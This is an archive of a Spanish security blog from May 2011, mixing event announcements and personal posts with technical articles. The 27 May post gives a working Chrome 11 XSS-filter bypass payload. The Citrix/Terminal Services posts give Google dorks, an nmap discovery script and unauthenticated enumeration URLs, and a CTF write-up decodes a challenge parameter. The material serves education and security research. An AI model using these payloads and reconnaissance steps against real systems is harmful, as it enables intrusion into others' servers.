martes, mayo 31, 2011

Agenda de Junio de cursos, saraos y conferencias

Aunque ha costado cerrar todo, por fin tengo, más o menos, ajustado el calendario de actividades para el mes de Junio que ya comienza, así que, por si te os pilla bien alguna actividad, os dejo a todos informados.

En esta semana, para mañana y pasado, tenemos previstos Trainings de la FOCA 2.7 a través de Internet, el día 1 en español y el día 2 en inglés. La nueva versión de la FOCA verá la luz en muy poco tiempo, y podréis descargar todos la versión Free.

La semana que viene salto el charco para irme a participar en la Universidad de La Selva, en Chiapas – México -, a un congreso tecnológico, donde daré una conferencia y un training. Al final, no sé bien ni cómo, consiguieron cuadrar todo para que yo pudiera estar allí con ellos, así que quiero darles las gracias por todos los esfuerzos que están realizando.

Tras el regreso a Madrid iré a participar el día 16 de Junio a las conferencias de La Red Innova. Allí creo que me sentiré otra vez como flamenca en museo de arte chino, pero intentaré pasármelo lo mejor que pueda durante mi media hora de sesión y todos los fastos que acompañen, que para algo estamos en el mes en el que los nacidos bajo el designio de Mercurio celebramos un nuevo giro del planeta alrededor de la gran estrella que nos calienta.

Después, comenzarán los Cursos de Verano, primero estaré en la Universidad de A Coruña, con el I Curso de Informática Forense de la Universidad de A Coruña, del que el plazo de registro en el tramo más económico acaba mañana, y ya cuenta con 50 asistentes apuntados.

El viernes de esa semana, coincidiendo con la entrada del verano, comenzará el módulo II del FTSAI, para el que Juan Luís G. Ramblatomará las riendas en su primera clase.

Para terminar el mes, los días 28, 29 y 30, he conseguido liar a José Selvi, Pedro Sánchez, Fernando Guillot, Silverhack, Rubén Santamarta, Juan Luís G. Rambla o Igor Lukic – entre otros – para que participen en el IV Curso de Verano de Seguridad Informática en la Universidad Europea de Madrid.

Al mismo tiempo, mis compañeros tienen un interesante calendario de Hands On Lab en Madrid y Virtual Hands On Lab a través de Internet, durante este mes de Junio. Vamos, un mes movidito el que se avecina por delante.

Saludos Malignos!

IV Curso de Verano de Seguridad y Auditoría Informática

Ya tenemos listo el IV Curso de Seguridad y Auditoría Informática, que en esta ocasión tendrá lugar en la Comunidad de Madrid, gracias a la Universidad Europea de Madrid, que lo acoge dentro de las acciones que forman el Master Universitario de Seguridad en las Tecnologías de la Información y las Comunicaciones, durante los días 28, 29 y 30 de Junio.

Entre los ponentes que se han dejado liar estarán José Selvi de S21Sec, Pedro Sánchez que viene por Bitdefender, el gran Rubén Santamarta, Fernando Guillot de Microsoft, Juan Garrido "Silverhack" con la charla de "Terminal Hackplications" que seguramente impartamos en la NoConName de este año, Alejandro Martín Bailón, Juan Luís G. Rambla y una sesión de Mitm en IPv6, Igor Lukic de Zendal Backup, Miguel López de SmartAccess, el gran Sergio "Pajarraco" de los Santos y, de momento, porque aún no está cerrada la agenda completa, yo con las novedades de la FOCA.


Los asistentes recibirán gratis uno de nuestros libros, aunque aún no he decidio cuál será, ya que tengo que liar a alguno aún para cerrar "pequeños plecos". Para los alumnos de la UEM hay un descuento grande, y hay tres tramos de registro, para premiar a los más madrugadores.

Así que, como las plazas son limitadas, registra cuanto antes tu hueco.

Saludos Malignos!

PD: Estamos en Madrid, así que yo soy la ley y nos iremos a cenotear por ahí en algún sitio, güeno, güeno.

lunes, mayo 30, 2011

Electronic Knock-Out Party calienta motores

Hay pocas conferencias que marcan mi calendario a principios de año. Y la EkoParty es una de ellas. Es una de esas que llevo en la tapa de mi computardora portátil. Es un recuerdo grato que vaya allí. No sé si será por el nivel de las charlas, lo espectacular del ambiente, lo familiar de Buenos Aires que es para alguien de Madrid o todos los amigos de Argentina y sudamérica que me ha regalado esa conferencia.

Es por eso que cada vez que me encuentro con alguno del eko-group, acabo preguntándoles: "¿Cuándo será? ¿Cuándo abriréis el CFP? ¿Habrá trainings? ¿Me dejaréis ir? ¿Cuándo? ¿Cuándo? ¿Cuando?". De hecho, tras el anuncio de fechas de la NoConName para este año, estaba que no dormía, ya que veía que se me podían juntar las dos al mismo tiempo. Cuando Fede me dijo que seguramente fuera la misma semana que la NoConName, casi me da algo. Lloré, supliqué, sollozé, hice pucheros,... "¿Fede, no puede ser la otra? Francisco, dile algo a Fede, que esa semana es la NCN y este va a ser el primer año que creo que voy a estar en la NCN de ponente, y no me lo quiero perder..."


El escenario de la Eko es de los más bonitos en que he hablado

"Che, tranquilo loco, que aún no está segura la fecha, tendremos en cuenta lo de la NCN por si alguno más se quiere venir de España para la Eko".

Al final, la Eko será la semana siguiente a la NCN, es decir, del 19 al 23 de Septiembre ... bien!, y ya está abierto el Call For Papers para que los más hax0rs empiecen a enviar sus trabajos hasta el 8 de Agosto. Si todo va bien, yo estaré en la Ekoparty dando un training el día 20 de Septiembre, pero aún no hemos terminado de concretar todos los detalles. Ya os iré avisando.

Y vosotros, aprovechad y comprad los tickets de ambas CON antes de que suban de precio o se acaben, que luego estamos como siempre, pidiendo ayuda para conseguir una entrada a cualquier precio, y no está la vida como para tirar el dinero };)

Saludos Malignos!

domingo, mayo 29, 2011

Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (3 de 4)

**************************************************************************************************
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (1 de 4)
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (2 de 4)
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (3 de 4)
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (4 de 4)
Autores: Juan Garrido "Silverhack" y Chema Alonso
**************************************************************************************************

Publicación web de aplicaciones Citrix

Tanto Citrix como Terminal Server, pueden publicar aplicaciones vía Web mediante un portal de conexión. Centrándonos en servidores Citrix, este portal es el que utilizarán los usuarios para conectarse a las aplicaciones corporativas de la empresa, como por ejemplo MetaframeXP, que vimos en la anterior parte de este artículo.


Figura 7: Aplicaciones publicadas en Citrix

Por regla general, el cliente Citrix, cuando necesita conocer qué aplicaciones se encuentran publicadas, utiliza un mecanismo basado en conexiones TCP para la enumeración de las mismas.

La instalación por defecto de servidores Citrix, sin embargo, habilita una funcionalidad que a día de hoy se encuentra en desuso, llamada Master Browser, utilizada por compatibilidad hacia atrás. Este servicio, que opera bajo el puerto UDP 1604, es utilizado para listar las aplicaciones publicadas.

El principal problema radica en que este servicio es accesible por parte de un usuario sin necesidad de autenticarse en el servidor, pudiendo, en la mayoría de casos, descubrir las aplicaciones que se encuentran publicadas en el servidor. Para ello, Ian Vitek, ya avisó de esto allá por el año 2002, y realizó una serie de scripts en Perl para el correcto aprovechamiento de este fallo.


Figura 8: Enumeración de aplicaciones en Citrix

Si este servicio se encuentra desactivado en el servidor, siempre se puede intentar enumerar las aplicaciones vía web, consultando los ficheros de configuración accesibles por HTTP, siempre y cuando las ACL lo permitan.

Para ello, uno de los ficheros a los que se puede acceder es el siguiente:

Config.xml: Fichero en donde se encuentra información sobre servidores internos, sistema de autenticación, redirección de elementos, etc… En la mayoría de casos, podremos enumerar los servidores internos de la organización, gracias a este fichero.


Figura 9: Fichero Config.xml descargado por GET


Figura 10: Servidores internos en fichero config.xml

Publicación vía Kaviza

En sistemas de publicación basados en Kaviza, empresa que compró Citrix cuyo principal nicho de negocio es la publicación de escritorios en sistemas VDI para pequeñas y medianas empresas, si se configuran erróneamente las ACL de listado de aplicaciones, se permite la enumeración de aplicaciones vía HTTP. Para ello, hay que solicitar por GET la URL /dt/hdx/enum.


Figura 11: Publicación de aplicaciones bajo el sistema Kaviza

Una vez realizado el descubrimiento de aplicaciones publicadas, se puede intentar descargar el fichero de conexión ICA, invocando /dt/hdx/launch


Figura 12: Fichero ICA descubierto

**************************************************************************************************
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (1 de 4)
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (2 de 4)
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (3 de 4)
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (4 de 4)
**************************************************************************************************

sábado, mayo 28, 2011

Soy un narizotas (... y me encanta)

Al final encontré un momento para comprar el comic en el que el gran Cels Piñols me hizo el honor de incluirme: Fan Letal Vintage. Ya contaba con un dibujo al estilo Piñols en el que salgo con el kit completo de gorro, melenas y camiseta de la FOCA, pero he de decir que cuando me vi en el comic, a los mandos de Matrix para conseguir no perder a McClane en su viaje al pasado, se me abrió una gran sonrisa... estaba allí dentro... no me refiero a dentro de Matrix, sino de un Fan Letal.


Recuperando a McClane de su viaje...

Para no escanear las páginas, y malograr mi comic, le he hecho un foto, que he subido en PNG libre de metadatos, para que no perdáis tiempo más que en moriros de envidia...

Después de pillar a Salvador Larroca en plan fan total en la Tenerife Lan Party del año pasado para tirarme una foto con él, de tener la caricatura que me hizo el gran Vizcarra, y de salir en Fan Letal, me queda robarle a Jan un Superlopez y que Ibañez me firme uno de mis Mortadelo y Filemón. Lo del tatuaje en la espalada de Frank Miller lo puedo dejar fuera de mis objetivos. ¡Cels... me hiciste feliz!

Saludos Malignos!

viernes, mayo 27, 2011

Saltándose el filtro Anti XSS de Google Chrome 11

La semana durante la cual estaba previsto que se publicase el Reto Hacking Infiltrados tuvimos un momento del pánico. El reto era básicamente un ataque de Session Fixation que se explotaba mediante XSS o HTML Injection, a gusto del consumidor.

Sabíamos que los jugadores tienen más tendencia por los ataques de XSS que por los de HTML Injection, así que el filtro AntiXSS de Internet Explorer 9 iba a dar un poco de guerra a los que pensaban que nosotros habíamos hecho el reto más difícil para IE9, cuando no era para nada así.

Sin embargo, durante la semana previa al comienzo del reto, Google actualizó Chrome a la versión 11... y pico, añadiendo un filtro AntiXSS que hacía que no se pudiera saltar fácilmente el reto tampoco con XSS en Google Chrome.

En un momento de pánico llegamos a pensar que no iba a funcionar tampoco con HTML Injection, pero así si funcionaba. Sin embargo, se ponía igual de complejo saltarlo en Chrome que en IE9 y perdía la gracia de la i. Es decir, si los jugadores se pasaban Firefox y Chrome con XSS y luego no les funcionaba en IE9 iban a tener que pensar dos veces la solución, mientras que si ya daban con ella en Chrome, pasarse IE9 iba a ser trivial.

La noche antes del reto, pensando incluso en cambiar las pruebas a otra cosa, Rodol y Manu dieron con cómo saltarse el filtro AntiXSS de Chrome aprovechando una funcionalidad muy divertida que trae ese navegador, la de completar el código fuente HTML mal escrito.

Supongamos que existe un lugar en el que se puede inyectra código script en la carga de, por ejemplo una imagen, inyectando algo como &tl;img src=”noexist” onerror=”alert();”/>, Google Chorme reemplazará la inyección original por algo como <img src="noexist" onerror=""> , eliminando la inyección javascript del código y evitando así el ataque XSS.

Sin embargo, Google Chrome tiene una funcionalidad que reescribe el código HTML que no está bien formado, y que puede ser utilizado para saltse el filtro XSS. Supongamos que una página HTML tiene un código en el falta la etiqueta de cierre, entonces Google Chorme escribirá la etiqueta de cierre correspondiente, para dejar un código bien escrito.

Si introducimos algo como <img src="noexist" onerror=alert, Chrome intentará cerrar correctamente la etiqueta, en este caso con un sencillo <html>, es decir, dejando la etiqueta como <img src="noexist" onerror="alert!!!</html">.

Esta funcionalidad puede ser utilizada para saltarse el filtro AntiXSS, haciendo que se convierta en un ataque XSS solo después de que sea modificado por el filtro que reescribe el código, es decir, en ese ejemplo podría hacerse una inyección como <img src="noexist" onerror=alert();//, ya que cuando sea reescrito se convertirá en algo como <img src="noexist" onerror="alert();//!!!</html">, permitiendo saltarse el filtro AntiXSS.

Saludos Malignos!

jueves, mayo 26, 2011

Libro de Aplicación del Esquema Nacional de Seguridad con tecnologías Microsoft

Pues como ya pasara con el libro de Aplícación de la LOPD con tecnologías Microsoft 2.0, mi compañero Juan Luís G. Rambla, que se ha dado la gran currada, y yo nos hemos vistos "liados" por el Spectrado Héctor Sánchez Montenegro, para lo que hoy es una realidad, el Libro de aplicación del Esquema Nacional de Seguridad con tecnologías Microsoft.


Como en la ocasión anterior, hay una pequeña tirada impresa, para los amantes de las bibliotecas en papel, pero todo el que quiera puede descargarlo en formato PDF desde la siguiente URL: Libro ENS con tecnología Microsoft.

El texto tiene algo más de 200 páginas, y en él, además de los prólogos de Microsoft, Inteco, El Centro Criptológico Nacional y el Ministerio de Política Territorial y Administraciones Públicas, intenta explicar qué es el Esquema Nacional de Seguridad, cómo se definen las dimensiones de seguridad y cómo se pueden aplicar las medidas de seguridad necesarias a cada dimensión con tecnologías Microsoft.

Esperamos que a los que os toque lidiar con el ENS os ayude a aplicarlo o a entenderlo un poco más y, si lo tienes que hacer en poco tiempo, tienes un resumen del libro en un webcast grabado: Webcast Aplicación ENS con tecnología Microsoft.

Saludos Malignos!

miércoles, mayo 25, 2011

Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (2 de 4)

**************************************************************************************************
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (1 de 4)
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (2 de 4)
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (3 de 4)
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (4 de 4)
Autores: Juan Garrido "Silverhack" y Chema Alonso
**************************************************************************************************

Búsqueda de portales Citrix

Los servicios de Citrix también pueden ser ofertados vía Web mediante la creación de portales que publican las aplicaciones o el escritorio completo. Esta característica de publicación vía web se de principalmente a evitar los problemas de puertos en conexiones remotas, haciendo que sea más fácil para todos los usuarios conectarse, o a integrar las aplicaciones dentro de un portal corporativo que oferte otro tipo de servicios.

A la hora de instalar este tipo de servicios en aplicaciones, se suelen crear unos sitios web especiales con rutas específicas que pueden ser utilizadas para descubrir los servicios de Citrix. Algunas búsquedas interesantes, utilizando el buscador de Google, son las siguientes:

- inurl:"NFuse16/login.asp"
- inurl:"NFuse17/login.asp"
- inrul:"Citrix/MetaframeXP/default/login.asp"



Figura 4: Búsqueda de portales Citrix

Estas búsquedas, se pueden realizar también utilizando Shodan como scanner para encontrar estos servicios. Por ejemplo, en el caso de los portales MetaframeXP, se utiliza un fichero llamado Nfuse.htm que redirige a la ubicación de publicacion del mismo. Basta con buscar ese fichero para encontrar el camino al servidor Citrix:


Figura 5: Búsqueda de portales Citrix en Shodan

Búsqueda de servidores Citrix por puertos con nmap

Una primera aproximación al descubrimiento de este tipo de servicios es la inclusión de escaneos específicos para intentar detectar si los servicios asociados a Terminal Server y/o Citrix se encuentran ofertando algún servicio al exterior, o para descubrirlos en una Intranet. Citrix opera de forma nativa por el puerto 1494, mientras que los servidores de Terminal Server, a la hora de ofertar servicios de publicación de aplicaciones y escritorio remoto, utilizan el puerto 3389.

Gracias a que en nmap se pueden incluir scripts personalizados, estos se pueden diseñar de forma sencilla para que guarden información sobre las direcciones IP de los servidores que tengan estos servicios publicados. Un script sencillo que realice esta función para detectar servidores Citrix y Terminal Server al mismo tiempo podría ser el siguiente:

description = [[
Script que realiza consultas a Terminal server o Citrix mediante una conexión al puerto por defecto.
]]
author = "Silverhack"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}
--Requerimos ShortPort para crear el constructor
require "shortport"
--Creamos la regla de conexión con los puertos de Terminal Server y Citrix
portrule = shortport.port_or_service({1494,3389},{"citrix-ica","ms-term-serv"})
action = function(host,port)
--Abrimos un fichero de escritura
file = io.open ("ServersFound.txt","a+")
--Si el puerto al que conecta es de Citrix, escribe en un fichero la dirección IP
     if port.number == 1494 and port.service == "citrix-ica" then
     file:write ("El Host ")
     file:write (host.ip.." Tiene el puerto 1494 activo!\n")
     file:flush()
     return "Puerto ICA Abierto. Se ha introducido en el fichero."
     end
     if port.number == 3389 and port.service == "ms-term-serv" then
--Si el puerto al que conecta es de Terminal Server, escribe en un fichero la dirección IP
     file:write ("El Host ")
     file:write (host.ip.." Tiene el puerto 3389 activo!\n")
     file:flush()
     return "Puerto RDP abierto. Se ha introducido en el fichero."
     end
--Cierra el fichero
    file:close()
    end


El resultado de aplicar dicho script a una sentencia con nmap es que, al encontrarse estos puertos en un estado OPEN, guarda la dirección IP más el puerto en un fichero.


Figura 6: Búsqueda de portales Citrix y Términal Services con nmap

**************************************************************************************************
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (1 de 4)
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (2 de 4)
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (3 de 4)
- Hacking Remote Apps: Fingerprinting con Terminal Services & Citrix (4 de 4)
**************************************************************************************************

martes, mayo 24, 2011

I Curso de Verano de Informática Forense en la Universidad de A Coruña

Llega el veranito y llegan los Cursos de Verano que este año serán dos, uno de Informática Forense y otro de Seguridad y Auditoría Informática, pero hoy hablaré solo del primero.

Gracias al trabajo del Decano de la Facultad de Informática, D. Alberto Valderruten, que ha hecho todo lo posible porque estuviéramos allí con esta formación. Hay que dar también las gracias al gran Diego Ferreiro, desde hace nada Ingeniero de Yahoo! por hacer de catalizador en todas las cosas que pasan por la Universidad de A Coruña.

Así, los días 22, 23 y 24 de Junio, es decir, acabando en el viernes para la disfrutar de la Noche de San Juan, tendrá lugar el I Curso de Informática Forense en la Universidad de A Coruña, en el que participarán Juan Garrido Caballero “Silverhack”, Miguel Gesteiro, José Parada, Director de Seguridad en Spectra, Juan Luís G. Rambla, Bitdefender, que ha dicho que nos mandará al gran Pedro Sánchez, de Conexión Inversa, Igor Lukic de Zendal Backup y el que suscribe de momento, aunque faltan por confirmar algunos ponentes que están cuadrando agendas.


Para todos los alumnos de la Universidad de A Coruña habrá precios especiales, y, para los más rápidos en la reserva también hay descuentos, ya que el registro es por tramos. Reserva tu plaza en: I Curso de Informática Forense en A Coruña.

Saludos Malignos!

lunes, mayo 23, 2011

Temporada de políticos

Bugs Bunny siempre fue un cabrón con pintas. Era un capullo capaz de sacar provecho de ser un dibujo de comic para siempre conseguir salir airoso en todas las aventuras. Por el contrario, el pobre Pato Lucas o el viejo Doc tenían que sufrir los rigores de la física más realista y más dura para acabar siempre puteados. De todas sus historias, hay una que marcó una época, en la que jodía la vida al cazador con la no apertura de la veda de los conejos. Así, le aprovechaba a dar de hostias al cazador con el cartel que decía que no estaba abierta la temporada de conejos.

Esto siempre es un así con los políticos, salen elegidos, y durante 4 años están dándote de hostias con el cartel de “cerrada la veda de políticos”, o lo que es lo mismo, ya podrás expresarte dentro de cuatro años, en las próximas elecciones, que yo mientras voy a hacer lo que me plazca.

Y es así como sucede, durante 4 largos años tenemos que aguantar mamonadas, robos, corrupciones y lo que más nos toca los huevos, chulería. Parece que un político electo consigue un grado extra de chulería que le permite vacilar más en el parlamento y delante de los micrófonos. Lo pueden hacer, están fuera del alcance de los cazadores, porque está cerrada la veda de los políticos. La tienen cerrada ellos mismos, mediante unos “pequeños controles en los órganos de justicia”.

El caso es que, tras realizarse unas elecciones, hay una rara situación en la que un político realmente entra en pánico, y es cuando viene su peor depredador: Otro político. Ese momento en que un cargo político debe ceder su puesto a otro político de un partido contrario, es un momento de tensión y desesperación. Para ellos, es como si alguien viniera a profanar su casa, tomando control de todo lo que ha sido suyo antes… y eso les hace sudar.

Es entonces cuando se producen las famosas “madrugás” o noches enteras destruyendo toda prueba o indicio de los tejemanejes que fueron orquestados desde sus otrora controlados dominios. Esas concesiones de construcción, esos correos electrónicos intercambiados, esas llamadas de teléfono hechas y recibidas que ponen de manifiesto hechos, etc… Cualquier prueba del pasado debe ser eliminada. Sin rastro. Todo debe estar perfecto y aséptico para el nuevo ocupante.

Así, desde hace años, en la “madrugá”, se hace uso de equipos de ingenieros informáticos que tienen que borrar de forma segura todos los datos de todos los equipos informáticos utilizados por las personas de su equipo, de todos los pendrives, CDs, DVDs o copias de seguridad que puedan contener algún rastro de lo que allí se coció durante el periodo en que ese cargo político saliente fue el rey.

Durante este periodo en que un equipo saliente tiene que dar entrada a un equipo entrante todo se transforma, y los informáticos tienen que hacer magia para dejarlo todo como si allí no hubiera cagado nadie nunca.

Sin embargo, en esta ocasión, la cosa va a ser mucho peor, ya que habrá que borrar discos duros de tamaños enormes, habrá que rebuscar por todos los rincones todos los dispositivos de almacenamiento, para que no se quede ningún USB con forma de Furby o de llavero con datos sensibles, habrá que eliminar todos los discos de Lady Gaga, y lo más difícil, habrá que limpiar todos los dispositivos móviles, smartphones, los iPhone, los iPad, etc… para evitar dejarse ningún documento peligroso.

Por el contrario, cuando entra el nuevo político, con energía, con ganas de tomar posesión del tan ansiado sillón, lo primero que hará tras apoltronarse después de haber posado para los medios con la mejor de sus falsas sonrisas y dicho al político saliente algo cortés, será meter a los forenses.

Otro equipo de informáticos, que vendrán cargados con detectores de metales para descubrir los dispositivos de almacenamiento perdidos, que desmontarán los discos duros para hacer análisis forenses offline, que recogerán teléfonos móviles, tabletas, discos de Lady Gaga y copias de seguridad de los CPDs, para pasarle el microscopio hasta el último bit, para extraer lo que algún día estuvo allí guardado.

Acabado ya el análisis forense, recibido ya el informé, el nuevo rey de la manada, tras los banquetes iniciales y toma de posesión de los PINs de las tarjetas de crédito que abren puertas en restaurantes y voluntades, el nuevo amo decidirá si lleva el asunto a los tribunales, o simplemente se guarda estos ases en la manga para sacarlos ante el primer escándalo que se le venga encima, para cantar, como eunuco solista, el tan utilizado tema de debate: “Y tú más”.

Con suerte, los más odiados, o más ladrones, o más hijosdealgo tendrán un informe pericial tan bien montado, y con tantas pruebas, que hará que sus huesos pasen a visitar a algunos de sus más ilustres antecesores en los bonitos apartamentos con rejas en las puertas, y comida caliente 3 veces al día. Allí donde, tal vez, alguien se acuerde de todas las que hicieron a la ciudadanía y, cambiándose los papeles, le diga “¿Qué hay de nuevo, Doc?”, mientras deja caer la pastilla de jabón con disimulo...

Saludos Malignos!

domingo, mayo 22, 2011

FOCA 2.7 preview Parte 1

Durante estos días se está afinando la versión 2.7 de la FOCA, pra que esté lista, a ser posible, para los Virtual HOLS de principios de este mes de Junio. Aunque aún se está peinando, ya os puedo enseñar algunas cosas que traerá esta versión:

Cola de tareas

Hasta el momento, FOCA dejaba la gestión de los límites de los trabajos en manos del sistema operativo, lo que podía hacer que se saturará el sistema en dominios muy grandes. Para autolimitar esto se ha creado una estructura de colas internas que permite limitar el número de trabajos simultáneos que se van lanzando con FOCA.

De esta manera, cada vez que quiere hacer una nueva tarea manda el trabajo a la cola, y será realizado cuando haya un hilo libre.


Figura 1: Panel de tareas

Búsqueda de URLS con parámetros

Otra de las caracterítiscas que se han añadido es la clasificación de las URLs que tienen parámetros GET en un apartado especial. Como ya sabéis, esos parámeteros serán buenos candidatos a buscar vulnerabilidades de algún tipo.


Figura 2: Búsqueda de URLs con parámetros

Búsqueda de easy SQLi y BSQLi bugs

En la versión Private de momento, y ya veremos si en la pro, hemos metido un módulo de búsqueda de BSQLi y BSQLi típicas. Más por simplificar más el trabajo, que por hacer que sea exhaustivo. Como todavía no está completamente analizado este módulo, no saldrá en la próxima versión Free.


Figura 3: Panel de Exploiting

Búsqueda de regsitros de servicios

Tal y como vimos os conté en el artículo de los registros de servicio y los registros del Activide Directory, FOCA ya analiza todos los que descubrimos, que van desde los de VoIP, los de AD, los ldap, los de IM, los de servicios Proxy, etc... os prometo poner la lista completa de todos los registros DNS que analizar FOCA.


Figura 4: Extración de servidores de Dell.com por búsqueda de DNS

Ya os contaré más cosas sobre la FOCA 2.7 en la segunda parte de este artículo.

Saludos Malignos!

sábado, mayo 21, 2011

El troyano del ePad que me comí yo

Que hay rumores falsos que se propagan por Internet como la pólvora es sabido por todos. Aún se está buscando el vídeo de Ricky Martin y el perro, mientras que la gente no toma los Actimel porque el cuerpo se hace adicto a ellos. Así es el tema de la reputación y la marca, como sufrió nuestro amigo César Sicre desde su "fake affair" con Paulina Rubio.

Y como dijo Dan Kaminsky tras haber sido petado públicamente: “Cuando estás en el campo de batalla te llueven las balas…” y algunas hasta te dan. Y éste es el caso que he sufrido yo en primera persona con respecto a una Prueba de Concepto con un rumor profesionalmente creado sobre que algunos ePads vendidos por Ebay traían troyanos que robaban la información y la enviaban a China.

Lógicamente, con esta cita a Dan Kaminsky no es que yo me considere ni mucho menos que me encuentro en una situación de ser objetivo de ataques tanto como él, pero sí que lo soy para los sufridos alumnos del Master de Seguridad de la UEM, en el que les hago sudar para conseguir aprobar con exámenes cada vez más enrevesados.

El caso es que tres de ellos, dirigidos malignamete por un compañero de profesorado en el master, orquestaron una maniobra para hacer creer a la gente una mentira que se propagara por Internet como un rumor. En este caso, el tema elegido fue que unos dispositivos, que existen y se llaman ePad, que funcionan con Android, que se vendían por Ebay – que es cierto que se venden por Ebay – venían troyanizados para robar datos.

Con este objetivo, crearon una identidad falsa - de la que crearon hasta perfil en Linkedin -, una cuenta de correo electrónico y un blog para publicar la historia. Para hacerlo más creíble, el blog se fue escribiendo durante varias entradas, en las que el protagonista del engaño contaba que le gustaban los iPad pero que no tenía pasta para comprarse uno, que había visto un ePad por Ebay muy barato y que se lo había comprado. Después, en siguientes posts, relataba como la WiFi le iba "rara" y que, tras analizar las conexiones, descubrió que enviaba datos a un servidor Chino.

En dicho servidor se almacenaban datos de los ePads que se habían vendido. Por supuesto, la página donde se guardaban los datos tenía SQL Injection y cualquiera podría entrar a comprobar esos datos – que eran más falsos que Judas -.

Tras publicar eso, decidieron spammear en blogs de renombre con comentarios para que la gente se fuera enterando de la noticia y conseguir efecto amplificación con nuevas publicaciones en blogs, periódicos, etc… y algo así consiguieron.

Los primeros que yo recuerdo en publicar esta historia fueron mis amigos de Dragonjar, que tras hacer todas las pruebas escribieron un buen reportaje al respecto. He de decir, y así lo comenté con los alumnos, que meter esta noticia no era tan descabellado y complicado, ya que: El ePad existe, el ePad se vende por Internet y troyanos para Android tienes de todos los colores, tamaños y sabores - hasta de vainilla -.

Sin embargo, estos pájaros que tengo por alumnos, y la malvada mente de su tutor se pusieron un objetivo, metérmela a mí. Y se pusieron manos a la obra. Yo ya había leído la noticia en Dragonjar, pero … como era de Android y un ataque por Ebay, pues no me apeteció escribir de ello. No he visto un ePad más que en fotos.

Como soy bastante malo contestando e-mails, con la cuenta falsa de Linkedin me agregaron al linkedin, y yo, que agrego a todo el mundo, le acepté sin más dilación. Después me pusieron un correo electrónico para pedirme que les ayudara a difundir la noticia, pero no contesté por falta de tiempo. Una semana más tarde me insistieron, y ya les respondí que vería que podía hacer para ayudarle a que la gente conociera su historia. Como ya había leído en Dragonjar, - sé que ellos prueban las cosas -, y no quería ser descortés con alguien que me pide algo, les dije que haría algo, pero… no encontré ni la forma ni el momento.

Su director de proyecto – me lo puedo imaginar nervioso y con fruición malvada en su cuartel general – les dijo que tenían que conseguir que yo cayera en el rumor, lo que deja claro que esto ya era un APT para mí y no un rumor cualquiera, con lo que me volvieron a enviar otro correo insistiéndome sobre el tema.

Con este tercer correo ya les dije que hablaría para publicarlo en Seguridad Apple y se lo pasé a un compañero que se encargó de redactar el post. Así que salió una noticia contando la historia de esta persona, por lo que al final me cazaron.

El día que se publicó la noticia en Seguridad Apple el servidor chino estaba caído y no se pudo probar nada. Eso obligó a ser prudente con la redaccion, por lo que no se afirmaba que los ePad vinieran troyanizados, sino que podría ser solo este caso, pero en todo momento se da por cierto el caso del protagonista.

La verdad es que me reí viendo la presentación ayer, mientras su tutor sonreía con cara de ca•$$”•$5n y Alejandro Ramos hacía de Nelson - señalándome decía “ha,ha” [A ver si acabas el libro en vez cachondearte de mí, ca32423Asdf] -. Así que aquí queda esto, como penitencia.

La verdad es que el nivel de los proyectos que se han presentado este año en el Master de Seguridad de la UEM ha sido muy bueno y he de felicitar a todos los que están dejándose su tiempo los viernes y sábados de todo un año por hacerlo. Se lo han currado, por lo que la nota mínima que se ha puesto ha sido de …

Por la seguridad personal de estos tres pájaros, para evitar que los de ePad les denuncien por difamación o les manden alguna visita inesperada, voy a mantenerlos en el anonimato. Además, utilizaron una foto de Internet de un tipo para suplantar la identidad, que espero que LES DENUNCIE, y se le caiga el pelo al director del proyecto }:) Muy buen trabajo chavales.

Saludos Malignos!

viernes, mayo 20, 2011

Solucionario a Reto Hacking Infiltrados (3 de 3)

**********************************************************************************************
- Solucionario a Reto Hacking Infiltrados by pepelux (1 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (2 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (3 de 3)
Autor: @pepeluxx
**********************************************************************************************

URL del Reto: Reto Hacking Infiltrados

4- Fase II

Para mí esta fase fue más divertida que las anteriores, ya que odio los XSS jeje y además, no requería de ninguna validación por una persona física. Esto daba más libertad para realizar pruebas. Que fuera más divertida no quiere decir que fuera más fácil :) Al entrar en el reto vemos esto:


Figura 5: Acceso en Fase II

En la URL nos aparecen 2 parámetros (mail y app_hash) y al pinchar en el botón Entrar nos dice que el mail no corresponde con el hash. La URL es esta:

http://rhinfiltrados.informatica64.com/F@S%E2%82%AC_TW0_INI.aspx?mail=CAoLAAIdARUWDhcGHCYAAhIdEwkOBwANB19YWhwEEA%3d%3d&app_hash=97c4655a4b1e7d07477a6c53a901bf691d9405a7

Y los parámetros:

mail=CAoLAAIdARUWDhcGHCYAAhIdEwkOBwANB19YWhwEEA==
app_hash=97c4655a4b1e7d07477a6c53a901bf691d9405a7


Aparentemente, tenemos que conseguir un mail que concuerde con un app_hash y, para ello, lo que vamos a hacer es analizar cada uno de los parámetros. El mail es claramente un base64 que si hacemos un unbase64 vemos algo ilegible. Tras varias pruebas con los HEX obtenidos vi que aplicando un XOR con la palabra infiltrados aparecía algo que llamaba la atención:

unbase64(mail) XOR 'infiltrados' -> _XZ###strad##&####

Así que probé a concatenar la palabra:

unbase64(mail) XOR 'infiltradosinfiltrados' -> _XZ###strador@informat

Y con algunas pruebas más:

unbase64(mail) XOR 'infiltradosinfiltradosinfiltrad'
-> administrador@informatica64.net

El sencillo script que usé fue (en perl, of course! :P ):


Figura 6: Script en Perl para decodificación de mail

